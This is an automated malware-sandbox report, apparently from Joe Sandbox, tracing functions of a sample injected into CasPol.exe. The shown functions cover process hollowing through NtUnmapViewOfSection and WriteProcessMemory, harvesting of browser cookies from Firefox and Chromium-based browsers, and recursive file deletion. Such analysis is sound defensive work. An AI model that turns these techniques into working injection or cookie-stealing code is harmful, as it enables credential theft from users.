                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                                                                                                                                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                                                                                                                                  • API String ID: 384173800-625181639
                                                                                                                                                                                                                                  • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                                                                                                                                                  • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE
                                                                                                                                                                                                                                  Function 00417245 Relevance: 61.5, APIs: 29, Strings: 6, Instructions: 290nativelibraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 447 417245-417262 448 417266-4172d9 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 447->448 449 4175cd 448->449 450 4172df-4172e6 448->450 452 4175cf-4175d9 449->452 450->449 451 4172ec-4172f3 450->451 451->449 453 4172f9-4172fb 451->453 453->449 454 417301-41732d call 436050 * 2 453->454 454->449 459 417333-41733e 454->459 459->449 460 417344-417374 CreateProcessW 459->460 461 4175c7 GetLastError 460->461 462 41737a-4173a2 VirtualAlloc Wow64GetThreadContext 460->462 461->449 463 417593-4175c5 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->463 464 4173a8-4173c8 ReadProcessMemory 462->464 463->449 464->463 465 4173ce-4173ee NtCreateSection 464->465 465->463 466 4173f4-417401 465->466 467 417403-41740e NtUnmapViewOfSection 466->467 468 417414-417436 NtMapViewOfSection 466->468 467->468 469 417477-41749e GetCurrentProcess NtMapViewOfSection 468->469 470 417438-417466 VirtualFree NtClose TerminateProcess 468->470 472 417591 469->472 473 4174a4-4174a6 469->473 470->449 471 41746c-417472 470->471 471->448 472->463 474 4174a8-4174ac 473->474 475 4174af-4174d6 call 435ad0 473->475 474->475 478 417516-417520 475->478 479 4174d8-4174e2 475->479 480 417522-417528 478->480 481 41753e-417542 478->481 482 4174e6-417509 call 435ad0 479->482 480->481 483 41752a-41753b call 417651 480->483 484 417544-417560 WriteProcessMemory 481->484 485 417566-41757d Wow64SetThreadContext 481->485 493 41750b-417512 482->493 483->481 484->463 488 417562 484->488 485->463 489 41757f-41758b ResumeThread 485->489 488->485 489->463 492 41758d-41758f 489->492 492->452 493->478
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                                                                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                                                                                                                                                                                  • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                                                                                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004173E6
                                                                                                                                                                                                                                  • NtUnmapViewOfSection.NTDLL(?,?), ref: 0041740E
                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041742E
                                                                                                                                                                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00417440
                                                                                                                                                                                                                                  • NtClose.NTDLL(?), ref: 0041744A
                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,00000000), ref: 00417496
                                                                                                                                                                                                                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                                                                                                                                                                                  • ResumeThread.KERNEL32(?), ref: 00417582
                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                                                                                                                                                                                  • NtUnmapViewOfSection.NTDLL(00000000), ref: 004175AC
                                                                                                                                                                                                                                  • NtClose.NTDLL(?), ref: 004175B6
                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004175C7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                                                                                                                                                                                                                                  • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`Wu$ntdll
                                                                                                                                                                                                                                  • API String ID: 3150337530-529412701
                                                                                                                                                                                                                                  • Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                                                                                                                                                                  • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
                                                                                                                                                                                                                                  Function 100012CB Relevance: 17.3, APIs: 2, Strings: 9, Instructions: 828COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1820 100012cb-100012fb call 10004160 call 10005f20 1825 100012fd-10001306 1820->1825 1826 1000133e-10001348 1820->1826 1827 10001315-10001339 call 10003b90 1825->1827 1828 10001308-10001310 call 10004160 1825->1828 1829 10001354-10001366 call 10006020 1826->1829 1830 1000134a-1000134f call 10004160 1826->1830 1827->1826 1828->1827 1836 10001368-10001371 1829->1836 1837 100013a9-100013b3 1829->1837 1830->1829 1838 10001380-100013a4 call 10003b90 1836->1838 1839 10001373-1000137b call 10004160 1836->1839 1840 100013b5-100013ba call 10004160 1837->1840 1841 100013bf-100013d1 call 10006120 1837->1841 1838->1837 1839->1838 1840->1841 1847 100013d3-100013d9 1841->1847 1848 1000140b-10001415 1841->1848 1851 100013e8-10001406 call 10003b90 1847->1851 1852 100013db-100013e3 call 10004160 1847->1852 1849 10001421-100015eb call 10005c00 call 10003a70 call 100067d0 call 10003a70 call 100067d0 call 10003a70 call 100067d0 call 10007a40 call 10003a70 * 2 call 10001ee0 1848->1849 1850 10001417-1000141c call 10004160 1848->1850 1888 100015f1-100015f5 1849->1888 1889 100017ea-100017fd 1849->1889 1850->1849 1851->1848 1852->1851 1890 10001848-1000184d call 1000a5c6 1888->1890 1891 100015fb-10001626 1888->1891 1892 10001800-10001802 call 10007e20 1889->1892 1897 10001852 1890->1897 1894 10001628-1000162a 1891->1894 1895 1000162c 1891->1895 1899 10001807-10001809 1892->1899 1898 1000162e-10001650 call 10003a70 call 10006220 1894->1898 1895->1898 1900 10001854-1000188e call 10003a70 1897->1900 1913 10001652 1898->1913 1914 10001654-10001666 call 100025a0 1898->1914 1902 10001815-1000183d 1899->1902 1903 1000180b-10001813 Sleep 1899->1903 1909 10001890-10001892 1900->1909 1910 10001894 1900->1910 1902->1897 1906 1000183f-10001841 1902->1906 1903->1892 1903->1902 1906->1900 1912 10001896-100018dc call 10003a70 call 10001ee0 1909->1912 1910->1912 1934 10001ae1-10001aee 1912->1934 1935 100018e2-100018e6 1912->1935 1913->1914 1917 1000166b-10001679 1914->1917 1919 1000167b-10001681 1917->1919 1920 100016dc-100016e6 1917->1920 1922 100016c1-100016d7 call 100040f0 1919->1922 1923 10001683-1000168c 1919->1923 1924 10001726-10001742 1920->1924 1925 100016e8-100016f1 1920->1925 1922->1920 1927 100016b8-100016be call 1000a956 1923->1927 1928 1000168e-10001691 1923->1928 1929 10001744-10001749 call 10004160 1924->1929 1930 1000174e-1000177f call 10004c10 call 10003ff0 1924->1930 1932 100016f3-100016f6 1925->1932 1933 1000171d-10001723 call 1000a956 1925->1933 1927->1922 1936 10001843 call 1000daab 1928->1936 1939 10001697-1000169c 1928->1939 1929->1930 1968 10001781-1000178b 1930->1968 1969 100017bf-100017e4 1930->1969 1932->1936 1937 100016fc-10001701 1932->1937 1933->1924 1941 10001af0-10001af9 call 10007e20 1934->1941 1935->1890 1938 100018ec-10001917 1935->1938 1936->1890 1937->1936 1946 10001707-1000170c 1937->1946 1947 10001919-1000191b 1938->1947 1948 1000191d 1938->1948 1939->1936 1949 100016a2-100016a7 1939->1949 1962 10001b05-10001b2d 1941->1962 1963 10001afb-10001b03 Sleep 1941->1963 1946->1936 1954 10001712-10001715 1946->1954 1955 1000191f-10001941 call 10003a70 call 100063b0 1947->1955 1948->1955 1949->1936 1956 100016ad-100016b0 1949->1956 1954->1936 1959 1000171b 1954->1959 1980 10001943 1955->1980 1981 10001945-10001957 call 100025a0 1955->1981 1956->1936 1961 100016b6 1956->1961 1959->1933 1961->1927 1966 10001b33 1962->1966 1967 10001b2f-10001b31 1962->1967 1963->1941 1963->1962 1973 10001b35-10001b6f call 10003a70 1966->1973 1967->1973 1970 100017b6-100017bc call 1000a956 1968->1970 1971 1000178d-1000178f 1968->1971 1969->1889 1969->1891 1970->1969 1971->1936 1974 10001795-1000179a 1971->1974 1983 10001b71-10001b73 1973->1983 1984 10001b75 1973->1984 1974->1936 1978 100017a0-100017a5 1974->1978 1978->1936 1985 100017ab-100017ae 1978->1985 1980->1981 1989 1000195c-1000196a 1981->1989 1987 10001b77-10001bab call 10003a70 call 10001ee0 call 10003420 1983->1987 1984->1987 1985->1936 1988 100017b4 1985->1988 2025 10001bb1-10001c56 call 100033e0 call 10003500 call 100064b0 call 10003450 call 100025a0 call 10003730 call 100036c0 call 10003460 call 10004c10 call 100036a0 call 100036c0 call 10003420 1987->2025 2026 10001c5c-10001c7c call 10003450 call 10007de0 call 10004c10 1987->2026 1988->1970 1991 1000196c-10001972 1989->1991 1992 100019cd-100019d7 1989->1992 1996 100019b2-100019c8 call 100040f0 1991->1996 1997 10001974-1000197d 1991->1997 1994 10001a17-10001a33 1992->1994 1995 100019d9-100019e2 1992->1995 1998 10001a35-10001a3a call 10004160 1994->1998 1999 10001a3f-10001a70 call 10004c10 call 10003ff0 1994->1999 2002 100019e4-100019e7 1995->2002 2003 10001a0e-10001a14 call 1000a956 1995->2003 1996->1992 2004 100019a9-100019af call 1000a956 1997->2004 2005 1000197f-10001982 1997->2005 1998->1999 2029 10001ab0-10001ad5 1999->2029 2030 10001a72-10001a7b 1999->2030 2002->1936 2011 100019ed-100019f2 2002->2011 2003->1994 2004->1996 2005->1936 2012 10001988-1000198d 2005->2012 2011->1936 2018 100019f8-100019fd 2011->2018 2012->1936 2013 10001993-10001998 2012->2013 2013->1936 2019 1000199e-100019a1 2013->2019 2018->1936 2022 10001a03-10001a06 2018->2022 2019->1936 2023 100019a7 2019->2023 2022->1936 2027 10001a0c 2022->2027 2023->2004 2025->2026 2048 10001c81-10001ed0 call 10004be0 * 11 call 100036c0 * 11 call 100038d0 * 3 call 10003460 * 5 call 100036c0 * 8 2026->2048 2027->2003 2029->1938 2033 10001adb 2029->2033 2034 10001aa7-10001aad call 1000a956 2030->2034 2035 10001a7d-10001a80 2030->2035 2033->1934 2034->2029 2035->1936 2039 10001a86-10001a8b 2035->2039 2039->1936 2043 10001a91-10001a96 2039->2043 2043->1936 2046 10001a9c-10001a9f 2043->2046 2046->1936 2049 10001aa5 2046->2049 2049->2034
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExistsFilePath
                                                                                                                                                                                                                                  • String ID: 0$RPe%$chrome.exe$invalid vector<T> subscript$msedge.exe$opera.exe$/L$TS$YM
                                                                                                                                                                                                                                  • API String ID: 1174141254-1233981215
                                                                                                                                                                                                                                  • Opcode ID: 22eea768eb0ac1053ae5efbe52efbd381925fc3d587047621c43a0140cdd6f4b
                                                                                                                                                                                                                                  • Instruction ID: ec441cf6cc5d574dc3d9e533db66c2798fe9b2d1f890f10e919fe81ba7d73607
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22eea768eb0ac1053ae5efbe52efbd381925fc3d587047621c43a0140cdd6f4b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4572D174D00208DBFB19DB64CC55BEE77B5EF41344F208198E406AB296DB71AF49CBA2
                                                                                                                                                                                                                                  Function 10005C00 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 233fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,-00000002,-00000002), ref: 10005CB2
                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 10005D2C
                                                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 10005E68
                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 10005E8C
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 10005E97
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 10005EDA
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Find$File$CloseNext$ExistsFirstPath
                                                                                                                                                                                                                                  • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                                                                                                  • API String ID: 913281501-405221262
                                                                                                                                                                                                                                  • Opcode ID: dae22583316b56d6af3c3b4fe4f33958d0cea0f6db4385a305567ebe6521a2a8
                                                                                                                                                                                                                                  • Instruction ID: d69103c2b3bb7b0ef1279a73142a9cc332cbad18a963587697917916d0a93de4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dae22583316b56d6af3c3b4fe4f33958d0cea0f6db4385a305567ebe6521a2a8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8181D270D00249DAFB14DFA0DC49BEEB7B5FF14385F61416AE805A7255EB32AE44CB20
                                                                                                                                                                                                                                  Function 10007E20 Relevance: 13.7, APIs: 9, Instructions: 188fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,00000000,75570F00), ref: 10007ED1
                                                                                                                                                                                                                                  • FindNextFileW.KERNELBASE(00000000,?,?,00000000,75570F00), ref: 10007F0A
                                                                                                                                                                                                                                  • RemoveDirectoryW.KERNEL32(?,?,00000000,75570F00), ref: 10007FFA
                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,00000000,75570F00), ref: 1000802D
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,00000000,75570F00), ref: 1000803A
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,75570F00), ref: 1000806D
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000,?,00000000,75570F00), ref: 10008079
                                                                                                                                                                                                                                  • RemoveDirectoryW.KERNEL32(?,?,00000000,75570F00), ref: 10008082
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000,?,00000000,75570F00), ref: 1000808C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2341273852-0
                                                                                                                                                                                                                                  • Opcode ID: 924e4a1749d0d59d34f62a1f8ef7dddde271016198b3f9fb598245e3bb22b1f8
                                                                                                                                                                                                                                  • Instruction ID: 5879e413a2d9e2f3862ed2fa56462b92cd9797ab3db8e6e954221e2a185392ff
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 924e4a1749d0d59d34f62a1f8ef7dddde271016198b3f9fb598245e3bb22b1f8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC61F03890025B8AEB50DF64C885BF6B3B5FF143D4F5141E9EC0997295EB329E86CB60
                                                                                                                                                                                                                                  Function 045710F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 04571137
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 04571151
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 0457115C
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 0457116D
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 0457117C
                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 04571193
                                                                                                                                                                                                                                  • FindNextFileW.KERNELBASE(00000000,00000010), ref: 045711D0
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 045711DB
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1083526818-0
                                                                                                                                                                                                                                  • Opcode ID: a042cfd7a2283d79fbdbaaaab7bbee27343e0db184172449480b93bb34728672
                                                                                                                                                                                                                                  • Instruction ID: 5e1049d62e086c6ae7a4aaff2da60a32c03838a88ee2b8fcc2a5814c6281808b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a042cfd7a2283d79fbdbaaaab7bbee27343e0db184172449480b93bb34728672
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5219E72504309ABD720EA64BC48F9B7BACFF84314F04093AB998D3190FB34E6089796
                                                                                                                                                                                                                                  Function 0040E54F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
